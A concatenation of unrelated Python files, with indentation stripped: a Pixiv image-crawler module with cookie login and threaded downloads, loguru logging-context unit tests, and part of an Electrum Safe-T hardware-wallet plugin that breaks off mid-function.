# 尽管同样实现了无人值守,但强烈建议每天启动时人工检查,为自己的PNL负责
#runParentProcess()
|
scraper_manga.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ['login', 'set_value', 'save_garage', 'dl_tag', 'dl_artist', 'dl_bookmark', 'dl_rank_global', 'dl_rank_daily',
'dl_rank_weekly', 'dl_rank_original', 'dl_rank_daily_r18', 'dl_rank_male_r18', 'dl_rank_weekly_r18',
'dl_diy_urls', 'random_one_by_classfi', 'get_value']
__author__ = "Akaisora"
import copy
import datetime
import functools
import inspect
import os
import random
import re
import sys
import threading
import time
import traceback
from functools import wraps
# import configparser
from html import unescape
import json
import pixiv_crawler.myconfig as config
import requests
from lxml import html
from pixiv_crawler.login_sim import login_for_cookies
filenameList = []
def login(save_cookies=True):
if os.path.exists(config.cookies_file):
try:
with open(config.cookies_file, "r") as f:
cookies_js = json.load(f)
cookiejar = requests.utils.cookiejar_from_dict(cookies_js, cookiejar=None, overwrite=True)
session_requests.cookies = cookiejar
except Exception as e:
print("load cookies failed, try log in")
traceback.print_exc()
r = None
try:
r = session_requests.get(pixiv_root)
except Exception as e:
traceback.print_exc()
print(e)
if r is not None and r.status_code == 200 and re.search('not-logged-in', r.text) is None:
print("loaded cookies")
return
# check username & password
if not config.username: raise Exception('Please set username')
if not config.password: raise Exception('Please set password')
# old login method, not work for captcha
# login_url='https://accounts.pixiv.net/login'
# r=session_requests.get(login_url)
# tree=html.fromstring(r.text)
# authenticity_token=list(set(tree.xpath("//input[@name='post_key']/@value")))[0]
# payload={
# 'pixiv_id':config.username,
# 'password':config.password,
# 'post_key':authenticity_token
# }
# r=session_requests.post(
# login_url,
# data=payload,
# headers=dict(referer=login_url)
# )
print("try log in")
cookies_dict = login_for_cookies(config)
cookiejar = requests.utils.cookiejar_from_dict(cookies_dict, cookiejar=None, overwrite=True)
session_requests.cookies = cookiejar
r = session_requests.get(pixiv_root)
if re.search('not-logged-in', r.text) is not None:
raise IOError('login failed, may deleting the cookies file can help')
else:
# print("log in")
if save_cookies:
with open(config.cookies_file, "w") as f: # 第一次登录后将存档cookies用来登录
cookies_js = requests.utils.dict_from_cookiejar(session_requests.cookies)
json.dump(cookies_js, f)
def apppendFilename(func):
@wraps(func)
def decorator(imgurl, filename, header=None, imgid=None, imgidext=None):
returnValue = func(imgurl, filename, header=header, imgid=imgid, imgidext=imgidext)
if returnValue:
filenameList.append(filename)
return returnValue
return decorator
@apppendFilename
def downloadImage(imgurl, filename, *, header=None, imgid=None, imgidext=None):
print("%s is downloading %s" % (threading.current_thread().name, filename))
try:
if header:
r = session_requests.get(imgurl, headers=header, timeout=30)
else:
r = session_requests.get(imgurl, timeout=30)
if r.status_code == 200:
try:
write_rlock.acquire()
with open(filename, 'wb') as f:
f.write(r.content)
finally:
write_rlock.release()
else:
raise IOError('requestFailed')
except Exception as e:
print('FAIL %s failed to download %s' % (threading.current_thread().name, filename))
if os.path.exists(filename): os.remove(filename)
faillog.append(filename)
traceback.print_exc()
return False
else:
print('SUCCESS %s has sucessfully downloaded %s' % (threading.current_thread().name, filename))
try:
garage_rlock.acquire()
if imgidext:
garage.add(imgidext)
elif imgid:
garage.add(imgid)
finally:
garage_rlock.release()
return True
# def listener():
# while(listen_active):
# x=input()
# if x=="q":
# try:
# garage_rlock.acquire()
# if os.path.exists(config.garage_file) :
# with open(config.garage_file,"r") as f:
# garage.update(f.read().split())
# with open(config.garage_file,"w") as f:
# f.write(" ".join(garage))
# print("local garage update complete")
# synchronize_garage()
# break
# finally:garage_rlock.release()
# elif x=="e":
# break
def synchronize_garage(): # 当你使用多台计算机下载图片时,你可能需要将你的garage文件同步到你的服务器上以免重复
try:
if not config.syn_enable: return
private_key = paramiko.RSAKey.from_private_key_file(config.RSAKey_file)
transport = paramiko.Transport((config.sftp_host, config.sftp_port))
transport.connect(username=config.sftp_username, pkey=private_key)
sftp = paramiko.SFTPClient.from_transport(transport)
remotedir = config.sftp_remotedir
if "garage" not in sftp.listdir(remotedir):
sftp.put("garage", remotedir + "garage")
sftp.get(remotedir + "garage", "tmp_garage")
with open("tmp_garage", "r") as f:
garage.update(f.read().split())
os.remove("tmp_garage")
with open("garage", "w") as f:
f.write(" ".join(garage))
sftp.put("garage", remotedir + "garage")
print("synchronize garage succeeded")
except Exception as e:
print("synchronize garage failed")
print(e)
finally:
try:
transport.close()
except Exception as e:
pass
def testrecommen(): # 未完成功能
r = session_requests.get(pixiv_root + "recommended.php")
tree = html.fromstring(r.text)
token = tree.xpath("/pixiv.context.token")
print(token)
# "//input[@name='post_key']/@value"
def complete_urllist(clsf):
def get_artist_imglist(artistid):
try:
url = config.url_artist_all_template % (artistid)
r = session_requests.get(url)
js = r.json()
imglist = list(dict(js['body']['illusts']).keys()) + list(dict(js['body']['manga']).keys())
return imglist
except Exception as e:
traceback.print_exc()
return []
def get_artist_artistname(artistid):
try:
url = config.url_artist_template % (artistid, 1)
r = session_requests.get(url)
res = re.search(r'"userId":"\d+","name":"([^"]*)"?', r.text)
artist_name = res.group(1)
artist_name = artist_name.encode('utf-8').decode('unicode_escape')
return artist_name
except Exception as e:
traceback.print_exc()
return "artist_" + artistid
newclsf = []
for clsf_name, item_list in clsf:
if clsf_name == "tag":
for tag, pagenum in item_list: newclsf.append(
("tag-" + tag, [config.url_tag_template % (tag, p) for p in range(1, pagenum + 1)]))
elif clsf_name == "illustrator":
for artistname, artistid, pagenum in item_list:
if artistname == '?':
artistname = get_artist_artistname(artistid)
imglist = get_artist_imglist(artistid)
newclsf.append(("illustrator-" + artistname, [imglist]))
elif clsf_name == "bookmark":
# 对于bookmark,后者表示页数
pagenum = item_list
newclsf.append(("bookmark", [config.url_bookmark_template % (p) for p in range(1, pagenum + 1)]))
elif clsf_name == "rank_global":
newclsf.append(("rank_global", [config.url_rank_global_template]))
elif clsf_name in ["rank_daily", "rank_weekly", "rank_original", "rank_daily_r18", "rank_male_r18",
"rank_weekly_r18"]:
url_template = getattr(config, "url_" + clsf_name + "_template")
pagenum = item_list
newclsf.append((clsf_name, [url_template % (p) for p in range(1, pagenum + 1)]))
else:
newclsf.append((clsf_name, item_list))
return newclsf
def get_master_imagelist_from_resp(classi, r):
def gmifr_tag(r):
url = r.url
# url=url.replace("/artworks","")
url = re.sub(r"/[a-zA-Z]+?(?=\?)", "", url, count=1)
url = url.replace("/tags/", "/ajax/search/artworks/")
ajax = url
r = session_requests.get(ajax)
js = r.json()
popular_permen_list = list(map(lambda x: x['illustId'], js['body']['popular']['permanent']))
popular_rec_list = list(map(lambda x: x['illustId'], js['body']['popular']['recent']))
data_list = list(map(lambda x: x['illustId'], js['body']['illustManga']['data']))
retlist = popular_permen_list + popular_rec_list + data_list
return retlist
def gmifr_bookmark(r):
tree = html.fromstring(r.text)
res = tree.xpath("//div[@data-items]/@data-items")[0]
js = json.loads(unescape(res))
retlist = list(map(lambda x: x['illustId'], js))
return retlist
try:
# print(r.text)
print(r.url)
if classi == "tag":
retlist = gmifr_tag(r)
elif classi == "bookmark":
retlist = gmifr_bookmark(r)
else:
retlist = re.findall(r'(?<=img-master/img)(.*?)(?=_master)', r.text)
try:
retlist_temp = gmifr_tag(r)
retlist.extend(retlist_temp)
except Exception as e:
pass
try:
retlist_temp = gmifr_bookmark(r)
retlist.extend(retlist_temp)
except Exception as e:
pass
retlist = list(set(retlist))
return retlist
except Exception as e:
traceback.print_exc()
return []
def check_tempfile_overflow(maxitems):
if not os.path.exists(config.temp_save_root): os.makedirs(config.temp_save_root)
temp_file_list = os.listdir(config.temp_save_root)
if (len(temp_file_list) > maxitems):
for filename in temp_file_list: os.remove(config.temp_save_root + filename)
print("cleared config.temp_save_root")
def random_one_by_classfi(classi, label="fate"):
'''classi= "normalrank" or "tag" or "r18rank" '''
try:
if classi == "tag" and "r-18" not in label.lower(): label += " -r-18"
check_tempfile_overflow(config.max_tempfile_number)
if not os.path.exists(config.local_save_root): os.makedirs(config.local_save_root)
if classi.lower() == "normalrank":
classification = [("normalRank",
[pixiv_root + "ranking.php?mode=daily&p=1", pixiv_root + "ranking.php?mode=daily&p=2",
pixiv_root + "ranking.php?mode=original"])]
elif classi.lower() == "tag":
classification = complete_urllist([("tag", [(label, 5)])])
elif classi.lower() == "r18rank":
classification = complete_urllist([("r18Rank", [pixiv_root + "ranking.php?mode=daily_r18&p=1",
pixiv_root + "ranking.php?mode=male_r18&p=1",
pixiv_root + "ranking.php?mode=weekly_r18&p=1",
pixiv_root + "ranking.php?mode=weekly_r18&p=2"])])
else:
return None
try:
login()
except Exception as e:
print(e);
print('Connect failed');
return None
url = random.choice(classification[0][1])
r = session_requests.get(url)
# imagelist=re.findall(r'(?<=img-master/img)(.*?)(?=_master)',r.text)
imagelist = get_master_imagelist_from_resp(classi.lower(), r)
if (not imagelist) and classi.lower() == 'tag':
url = random.choice(complete_urllist([("tag", [(label, 1)])])[0][1])
r = session_requests.get(url)
imagelist = get_master_imagelist_from_resp(classi.lower(), r)
if r.status_code != 200 or not imagelist: return None
img = random.choice(imagelist)
imgid = re.search('\d+(?=(_|$))', img).group(0)
toDownlist = imgid2source_url(imgid, "single", config.local_save_root)
if len(toDownlist) > 0:
orgurl, filename = toDownlist[0]
else:
return None
if os.path.exists(filename): return filename
refer = referpfx + imgid
imgidext = os.path.splitext(os.path.basename(filename))[0]
# print(orgurl,filename,refer,imgid,imgidext)
# exit(0)
if downloadImage(orgurl, filename, header={"referer": refer}, imgid=imgid, imgidext=imgidext):
return filename
else:
return None
except Exception as e:
traceback.print_exc()
def imgid2source_url(imgid, mode="single", local_save=None):
if not local_save: local_save = config.local_save_root
refer = referpfx + imgid
try:
toDownlist = []
r = session_requests.get(refer, timeout=25)
tree = html.fromstring(r.text)
content = tree.xpath("/html/head/meta[@id='meta-preload-data']/@content")[0]
jsdata = content
if jsdata:
js = json.loads(jsdata)
else:
print("load jsdata fail")
return []
js = js["illust"][imgid]
pageCount = js["pageCount"]
match_manga = pageCount > 1
original_url = js['urls']['original']
if mode == "single":
toDownlist.append((original_url, local_save + os.path.split(original_url)[1]))
else:
for i in range(0, pageCount):
original_url_p = original_url.replace("p0", "p" + str(i))
toDownlist.append((original_url_p, local_save + os.path.split(original_url_p)[1]))
return toDownlist
except Exception as e:
faillog.append(imgid)
print(e)
return []
def load_config():
global proxies
if config.proxies_enable:
proxies = {'http': config.socks, 'https': config.socks}
else:
proxies = None
for ch in ['%y', '%m', '%d', '%H', '%M', '%S']:
config.local_save_root = config.local_save_root.replace(ch, datetime.datetime.now().strftime(ch))
# classi_list=['normalRank','r18Rank','bookmark','tag','illustrator']
# classification=[]
# for classi in classi_list:
# if config.getboolean('classification',classi):
# classification.append((classi,eval(config['classification'][classi+'_list'])))
# ----------Constants
pixiv_root = "https://www.pixiv.net/"
referpfx = r'https://www.pixiv.net/member_illust.php?mode=medium&illust_id='
# ----------global vars
load_config()
if config.syn_enable: import paramiko
session_requests = requests.session()
session_requests.proxies = proxies
write_rlock = threading.RLock()
garage_rlock = threading.RLock()
garage = set()
faillog = []
def batch_download(classification, max_pic_num=100, deep_into_manga=False, add_classname_in_path=True):
global listen_active
# ----------PREDO
# 尝试登陆, 登陆分离
# try: login()
# except Exception as e:print(e);print('Connect failed');traceback.print_exc();exit(0)
# 创建存储位置
if not os.path.exists(config.local_save_root): os.makedirs(config.local_save_root)
# 检查garage文件并更新garage
if os.path.exists(config.garage_file): # garage文档存放车库清单,避免文件重复
with open(config.garage_file, "r") as f:
garage.update(f.read().split())
classification = complete_urllist(classification)
# exit(0)
# synchronize_garage()
pic_num = 0
# faillog=[]
threads = []
# write_rlock=threading.RLock()
# garage_rlock=threading.RLock()
# ----------MAINPROC
# listen_active=True
# t=threading.Thread(target=listener)
# t.start()
for classi, urlList in classification:
local_save = config.local_save_root + (classi + "/" if add_classname_in_path else "")
if not os.path.exists(local_save): os.makedirs(local_save)
classi_mode = "tag" if "tag" in classi else "illustrator" if "illustrator" in classi else classi
for pageUrl in urlList:
try:
if classi_mode == "illustrator":
imagelist = pageUrl
else:
rankPage = session_requests.get(pageUrl)
imagelist = get_master_imagelist_from_resp(classi_mode, rankPage)
except Exception as e:
faillog.append(pageUrl + "Pagefail")
continue
for img in imagelist:
try:
imgid = re.search('\d+(?=(_|$))', img).group(0)
except Exception as e:
print('fail : ' + img)
faillog.append(img)
continue
refer = referpfx + imgid
# 在非manga模式的情况下提前剪枝
if (not deep_into_manga and imgid + "_p0" in garage):
print("Skipped %s" % imgid)
continue
toDownlist = imgid2source_url(imgid, "manga" if deep_into_manga else "single", local_save)
for orgurl, filename in toDownlist:
imgidext = os.path.splitext(os.path.basename(filename))[0]
if (imgidext in garage) and not ("illustrator" == classi_mode):
print("Skipped %s" % imgid)
continue
if os.path.exists(filename):
print("image file %s existed" % imgid)
garage.add(imgidext)
continue
print("<" + orgurl + ">")
t = threading.Thread(target=downloadImage, args=(orgurl, filename),
kwargs={"header": {"referer": refer}, "imgid": imgid, "imgidext": imgidext})
threads.append(t)
while sum(map(lambda x: 1 if x.is_alive() else 0, threads)) >= config.max_thread_num: time.sleep(1)
t.start()
# 控制数量 提前结束
pic_num += 1
if max_pic_num != -1 and pic_num >= max_pic_num:
for t in threads:
if t.is_alive(): t.join()
if faillog:
print('-------------------------faillog-------------------------')
for log in faillog: print(log)
return
for t in threads:
if t.is_alive(): t.join()
# _______________AFTER
if faillog:
print('-------------------------faillog-------------------------')
for log in faillog: print(log)
# with open(config.garage_file,"w") as f:
# f.write(" ".join(garage))
# synchronize_garage()
# listen_active=False
# print("END")
# FUNCTIONS
def set_value(value_name, value):
'''Legal attributes:
username
password
local_save_root
garage_file
cookies_file
max_thread_num
socks: set None if not use
'''
if value_name not in ['username', 'password', 'local_save_root', 'garage_file', 'cookies_file', 'max_thread_num',
'socks', 'phantomjs', 'firefox', 'chrome']:
raise ValueError("Illegal Attribute")
if value_name == "socks":
if not value:
config.proxies_enable = False
session_requests.proxies = None
else:
value = value.replace("socks5h://", "")
setattr(config, value_name, "socks5h://" + value)
config.proxies_enable = True
proxies = {'http': config.socks, 'https': config.socks}
session_requests.proxies = proxies
elif value_name == "local_save_root":
if value[-1] != '/': value = value + "/"
for ch in ['%y', '%m', '%d', '%H', '%M', '%S']:
if ch in value: value = value.replace(ch, datetime.datetime.now().strftime(ch))
setattr(config, value_name, value)
else:
setattr(config, value_name, value)
def get_value(value_name):
'''Legal attributes:
username
password
local_save_root
garage_file
cookies_file
max_thread_num
socks: set None if not use
'''
if value_name not in ['username', 'password', 'local_save_root', 'garage_file', 'cookies_file', 'max_thread_num',
'socks', 'phantomjs', 'firefox', 'chrome']:
return None
return getattr(config, value_name)
def save_garage(garage_file=None):
'''Save downloaded image list, to avoid repeating downloading'''
if not garage_file:
garage_file = config.garage_file
with open(garage_file, "w") as f:
f.write(" ".join(garage))
def resetAndReturnFilenameList(func):
sig = inspect.signature(func)
@wraps(func)
def decorator(*args, **kwargs):
bound_arguments = sig.bind(*args, **kwargs)
bound_arguments.apply_defaults()
pic_num = bound_arguments.arguments["pic_num"]
deep_into_manga = bound_arguments.arguments["deep_into_manga"]
add_classname_in_path = bound_arguments.arguments["add_classname_in_path"]
return_list = []
for item in ["tag", "artist_id", "urls"]:
try:
argument = bound_arguments.arguments[item]
func(argument,
pic_num=pic_num,
deep_into_manga=deep_into_manga,
add_classname_in_path=add_classname_in_path)
while len(filenameList) != 0:
return_list.append(filenameList.pop())
return return_list
except KeyError:
pass
func(pic_num=pic_num,
deep_into_manga=deep_into_manga,
add_classname_in_path=add_classname_in_path)
while len(filenameList) != 0:
return_list.append(filenameList.pop())
return return_list
return decorator
@resetAndReturnFilenameList
def dl_tag(tag, pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "tag")
classification = [("tag", [(tag, (pic_num + ppp - 1) // ppp)])]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_artist(artist_id, pic_num, deep_into_manga=True, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "illustrator")
classification = [("illustrator", [("?", artist_id, -1 if pic_num == -1 else ((pic_num + ppp - 1) // ppp))])]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_bookmark(pic_num, deep_into_manga=True, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "bookmark")
classification = [("bookmark", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_global(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_global")
classification = [("rank_global", 1)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_daily(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_daily")
classification = [("rank_daily", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_weekly(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_weekly")
classification = [("rank_weekly", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_original(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_original")
classification = [("rank_original", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_daily_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_daily_r18")
classification = [("rank_daily_r18", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_male_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_male_r18")
classification = [("rank_male_r18", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_rank_weekly_r18(pic_num, deep_into_manga=False, add_classname_in_path=True):
ppp = getattr(config, "pic_per_page_" + "rank_weekly_r18")
classification = [("rank_daily", (pic_num + ppp - 1) // ppp)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
@resetAndReturnFilenameList
def dl_diy_urls(urls, pic_num, deep_into_manga=False, add_classname_in_path=True):
if not isinstance(urls, list):
urls = [urls]
classification = [("DIY_urls", urls)]
batch_download(classification, pic_num, deep_into_manga, add_classname_in_path)
if __name__ == "__main__":
pass
# batch_download()
# print(random_one_by_classfi("tag", "azurlane"))
# login()
# print("login in")
# print(get_artist_artistname("21848"))
|
test_contextualize.py
|
import asyncio
import sys
import threading
import pytest
from loguru import logger
def test_contextualize(writer):
logger.add(writer, format="{message} {extra[foo]} {extra[baz]}")
with logger.contextualize(foo="bar", baz=123):
logger.info("Contextualized")
assert writer.read() == "Contextualized bar 123\n"
def test_contextualize_as_decorator(writer):
logger.add(writer, format="{message} {extra[foo]} {extra[baz]}")
@logger.contextualize(foo=123, baz="bar")
def task():
logger.info("Contextualized")
task()
assert writer.read() == "Contextualized 123 bar\n"
def test_contextualize_in_function(writer):
logger.add(writer, format="{message} {extra}")
def foobar():
logger.info("Foobar!")
with logger.contextualize(foobar="baz"):
foobar()
assert writer.read() == "Foobar! {'foobar': 'baz'}\n"
def test_contextualize_reset():
contexts = []
output = []
def sink(message):
contexts.append(message.record["extra"])
output.append(str(message))
logger.add(sink, format="{level} {message}")
logger.info("A")
with logger.contextualize(abc="def"):
logger.debug("B")
logger.warning("C")
logger.info("D")
assert contexts == [{}, {"abc": "def"}, {"abc": "def"}, {}]
assert output == ["INFO A\n", "DEBUG B\n", "WARNING C\n", "INFO D\n"]
@pytest.mark.xfail(sys.version_info < (3, 5, 3), reason="ContextVar backport not supported")
def test_contextualize_async(writer):
logger.add(writer, format="{message} {extra[i]}", catch=False)
async def task():
logger.info("Start")
await asyncio.sleep(0.1)
logger.info("End")
async def worker(i):
with logger.contextualize(i=i):
await task()
async def main():
workers = [worker(i) for i in range(5)]
await asyncio.gather(*workers)
await logger.complete()
asyncio.run(main())
assert sorted(writer.read().splitlines()) == ["End %d" % i for i in range(5)] + [
"Start %d" % i for i in range(5)
]
def test_contextualize_thread(writer):
logger.add(writer, format="{message} {extra[i]}")
def task():
logger.info("Processing")
def worker(entry_barrier, exit_barrier, i):
with logger.contextualize(i=i):
entry_barrier.wait()
task()
exit_barrier.wait()
entry_barrier = threading.Barrier(5)
exit_barrier = threading.Barrier(5)
threads = [
threading.Thread(target=worker, args=(entry_barrier, exit_barrier, i)) for i in range(5)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sorted(writer.read().splitlines()) == ["Processing %d" % i for i in range(5)]
def test_contextualize_before_bind(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger_2 = logger.bind(foobar="baz")
with logger.contextualize(foobar="baz_2"):
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz_2\nB baz\nC baz\n"
def test_contextualize_after_bind(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="baz"):
logger_2 = logger.bind(foobar="baz_2")
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz\nB baz_2\nC baz_2\n"
def test_contextualize_using_bound(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger_2 = logger.bind(foobar="baz")
with logger_2.contextualize(foobar="baz_2"):
logger.info("A")
logger_2.info("B")
logger_2.info("C")
assert writer.read() == "A baz_2\nB baz\nC baz\n"
def test_contextualize_before_configure(writer):
logger.add(writer, format="{message} {extra[foobar]}")
logger.configure(extra={"foobar": "baz"})
with logger.contextualize(foobar="baz_2"):
logger.info("A")
logger.info("B")
assert writer.read() == "A baz_2\nB baz\n"
def test_contextualize_after_configure(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="baz"):
logger.configure(extra={"foobar": "baz_2"})
logger.info("A")
logger.info("B")
assert writer.read() == "A baz\nB baz_2\n"
def test_nested_contextualize(writer):
logger.add(writer, format="{message} {extra[foobar]}")
with logger.contextualize(foobar="a"):
with logger.contextualize(foobar="b"):
logger.info("B")
logger.info("A")
with logger.contextualize(foobar="c"):
logger.info("C")
assert writer.read() == "B b\nA a\nC c\n"
def test_context_reset_despite_error(writer):
logger.add(writer, format="{message} {extra}")
try:
with logger.contextualize(foobar=456):
logger.info("Division")
1 / 0
except ZeroDivisionError:
logger.info("Error")
assert writer.read() == "Division {'foobar': 456}\nError {}\n"
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'Safe-T mini', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
